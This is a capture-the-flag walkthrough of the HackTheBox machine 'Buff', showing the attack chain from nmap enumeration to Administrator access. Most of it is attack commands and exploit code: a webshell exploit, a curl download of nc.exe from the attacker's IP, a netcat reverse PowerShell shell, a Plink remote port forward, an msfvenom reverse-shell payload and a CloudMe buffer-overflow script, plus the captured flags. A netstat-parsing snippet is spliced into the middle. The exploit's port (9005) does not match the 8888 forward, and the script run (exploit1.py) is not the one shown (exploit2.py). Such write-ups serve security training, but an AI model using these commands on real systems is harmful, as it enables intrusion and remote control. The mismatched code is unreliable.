NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-22 09:37 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:37
Completed NSE at 09:37, 0.00s elapsed
Initiating NSE at 09:37
Completed NSE at 09:37, 0.00s elapsed
Initiating NSE at 09:37
Completed NSE at 09:37, 0.00s elapsed
Initiating Ping Scan at 09:37
Scanning 10.10.10.198 [4 ports]
Completed Ping Scan at 09:37, 0.90s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:37
Scanning buff.htb (10.10.10.198) [1000 ports]
Discovered open port 8080/tcp on 10.10.10.198
Completed SYN Stealth Scan at 09:38, 45.74s elapsed (1000 total ports)
Initiating Service scan at 09:38
Scanning 1 service on buff.htb (10.10.10.198)
Completed Service scan at 09:38, 9.32s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against buff.htb (10.10.10.198)
Retrying OS detection (try #2) against buff.htb (10.10.10.198)
Initiating Traceroute at 09:38
Completed Traceroute at 09:38, 0.41s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 09:38
Completed Parallel DNS resolution of 2 hosts. at 09:38, 0.29s elapsed
NSE: Script scanning 10.10.10.198.
Initiating NSE at 09:38
Completed NSE at 09:39, 34.64s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 12.42s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Nmap scan report for buff.htb (10.10.10.198)
Host is up (0.48s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Randomized

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   399.14 ms 10.10.14.1
2   413.69 ms buff.htb (10.10.10.198)

NSE: Script Post-scanning.
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.38 seconds
           Raw packets sent: 2106 (96.348KB) | Rcvd: 225 (19.761KB)
PORT 8080 ENUMERATION
There is not much here, but the admin page has an upload option, so let's search for a public exploit for this web application (the Gym Management System):
https://www.exploit-db.com/exploits/48506
Here we go with our exploit!!
GETTING USER ACCESS
┌─[✗]─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #python web.py http://buff.htb:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU=====================" 
             \/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> curl http://10.10.14.135/nc.exe -o nc.exe
C:\xampp\htdocs\gym\upload> .\nc.exe 10.10.14.135 9008 -e powershell.exe
┌─[✗]─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #rlwrap nc -lnvp 9008
listening on [any] 9008 ...
connect to [10.10.14.135] from (UNKNOWN) [10.10.10.198] 50045
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\xampp\htdocs\gym\upload> whoami
whoami
buff\shaun
PS C:\xampp\htdocs\gym\upload> cd c:\users\shaun\desktop
cd c:\users\shaun\desktop
PS C:\users\shaun\desktop> type user.txt
type user.txt
7ddf32e17a6ac5ce04a8ecbf782ca509
PS C:\users\shaun\desktop>
GETTING ROOT ACCESS
On the box, port 8888 is listening locally and belongs to CloudMe, which has a known buffer overflow we can use. The Python exploit cannot be run on the Windows machine itself, so instead we forward the port back to our own machine and run it from there.
Exploit : https://www.exploit-db.com/exploits/48389
Steps involved here:
1. Download Plink.exe: https://www.softpedia.com/get/Network-Tools/Telnet-SSH-Clients/Tatham-Plink.shtml
2. Upload it to Buff's machine.
3. Start the SSH service on your machine: service ssh start
4. Then run the following command on Buff:
.\Plink.exe -v -x -a -noagent -ssh -pw $PASSWORD -R 8888:127.0.0.1:8888 $USERNAME@$IP
The -R 8888:127.0.0.1:8888 option asks your SSH server to listen on its own port 8888 and relay every connection back through the tunnel to 127.0.0.1:8888 on Buff, where CloudMe is listening.
The output will open a shell on your machine, as shown below:
PS C:\users\shaun\downloads> .\Plink.exe -v -x -a -noagent -ssh -pw liquid -R 8888:127.0.0.1:8888 age@10.10.14.135
.\Plink.exe -v -x -a -noagent -ssh -pw liquid -R 8888:127.0.0.1:8888 age@10.10.14.135
Looking up host "10.10.14.135" for SSH connection
Connecting to 10.10.14.135 port 22
We claim version: SSH-2.0-PuTTY_Release_0.74
Remote version: SSH-2.0-OpenSSH_8.3p1 Debian-1
Using SSH protocol version 2
Doing ECDH key exchange with curve Curve25519 and hash SHA-256 (SHA-NI accelerated)
Server also has ecdsa-sha2-nistp256/ssh-rsa host keys, but we don't know any of them
Host key fingerprint is:
ssh-ed25519 255 32:90:52:02:e3:0d:b7:79:f4:73:03:9e:e1:cb:e8:ed
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 32:90:52:02:e3:0d:b7:79:f4:73:03:9e:e1:cb:e8:ed
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) n
Initialised AES-256 SDCTR (AES-NI accelerated) outbound encryption
Initialised HMAC-SHA-256 (SHA-NI accelerated) outbound MAC algorithm
Initialised AES-256 SDCTR (AES-NI accelerated) inbound encryption
Initialised HMAC-SHA-256 (SHA-NI accelerated) inbound MAC algorithm
Using username "age".
Sent password
Access granted
Requesting remote port 8888 forward to 127.0.0.1:8888
Opening main session channel
Remote port forwarding from 8888 enabled
Opened main channel
Allocated pty
Started a shell/command
Linux liquid 5.6.0-kali1-amd64 #1 SMP Debian 5.6.7-1kali1 (2020-05-12) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
age@liquid:~$
Now let's check the listening ports on our machine; port 8888 is now forwarded:
age@liquid:~$ netstat -ltn
netstat -ltn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:902             0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:50505         0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:3790            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:8888          0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:3001          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN
tcp6       0      0 :::902                  :::*                    LISTEN
tcp6       0      0 ::1:7337                :::*                    LISTEN
tcp6       0      0 ::1:8307                :::*                    LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
tcp6       0      0 ::1:8888                :::*                    LISTEN
tcp6       0      0 :::443                  :::*                    LISTEN
age@liquid:~$
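To verify the forward programmatically instead of by eye, here is an added example (not part of the original walkthrough) that parses netstat -ltn output like the listing above and reports whether a port is bound only to loopback. An SSH -R forward binds to the server's loopback by default unless the server sets GatewayPorts, so 8888 should show up as loopback-only; the sample output is constructed from the lines shown on the page.

```python
import re
from typing import List, Tuple

# Constructed sample, trimmed from the netstat -ltn listing above.
NETSTAT_SAMPLE = """Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:8888          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
tcp6       0      0 ::1:8888                :::*                    LISTEN
"""

# proto, recv-q, send-q, local address, foreign address, state
LISTEN_RE = re.compile(r"^(tcp6?)\s+\d+\s+\d+\s+(\S+)\s+\S+\s+LISTEN\s*$")

LOOPBACK = {"127.0.0.1", "::1"}


def parse_listeners(output: str) -> List[Tuple[str, str, int]]:
    """Return (proto, bind_address, port) for every LISTEN line."""
    listeners = []
    for line in output.splitlines():
        m = LISTEN_RE.match(line)
        if not m:
            continue  # header lines and non-listening sockets
        proto, local = m.group(1), m.group(2)
        # Split on the last colon so IPv6 forms like ':::22' and '::1:8888' work.
        addr, _, port = local.rpartition(":")
        listeners.append((proto, addr, int(port)))
    return listeners


def port_exposure(output: str, port: int) -> str:
    """Classify how PORT is bound: 'absent', 'loopback' or 'all-interfaces'."""
    binds = {addr for _, addr, p in parse_listeners(output) if p == port}
    if not binds:
        return "absent"
    if binds <= LOOPBACK:
        return "loopback"
    return "all-interfaces"


if __name__ == "__main__":
    for p in (8888, 22, 9999):
        print(p, port_exposure(NETSTAT_SAMPLE, p))
```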
Now we modify the exploit: generate a reverse shell payload and swap it in for the payload in the original code.
┌─[✗]─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.135 LPORT=9003 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of c file: 1386 bytes
unsigned char buf[] =
(324 bytes of raw shellcode omitted from this listing)
Replace the payload in the exploit with the shellcode generated above, run the exploit, and remember to start a listener on the port given to msfvenom (9003).
WHOLE CODE WILL LOOK LIKE THIS:
┌─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #cat exploit2.py
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68"   # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
# (shellcode bytes omitted from this listing; this is the slot the
#  msfvenom reverse-shell payload generated above goes into)
payload = b""

# pad the frame out to 1500 bytes in total
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 9005))   # port CloudMe is reached on (the forward above used 8888)
    s.send(buf)
except Exception as e:
    print(e)   # original printed sys.exc_value, which needs Python 2 and an unimported sys
RUN THE EXPLOIT :
┌─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #python exploit1.py
ON NETCAT LISTENER :
age@liquid:/root/Desktop/HTB/buff$ nc -lnvp 9003
listening on [any] 9003 ...
connect to [10.10.14.135] from (UNKNOWN) [10.10.10.198] 49778
Microsoft Windows [Version 10.0.17134.1550]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>type root.txt
type root.txt
3dc4c38834d57057973b16256cc750d6
And there we have Administrator access.
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE